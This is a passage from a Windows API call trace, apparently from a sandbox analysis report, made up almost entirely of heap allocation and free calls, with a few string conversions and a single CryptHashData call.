dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0243.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0243.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0243.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0243.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0243.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0243.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0243.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0243.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51100 [0243.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51100, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0243.866] CryptHashData (hHash=0xa870d0, pbData=0x2e54ec8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.867] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0243.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0243.867] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0243.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.868] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0243.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0243.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0243.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0243.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0243.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0243.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0243.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0243.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, 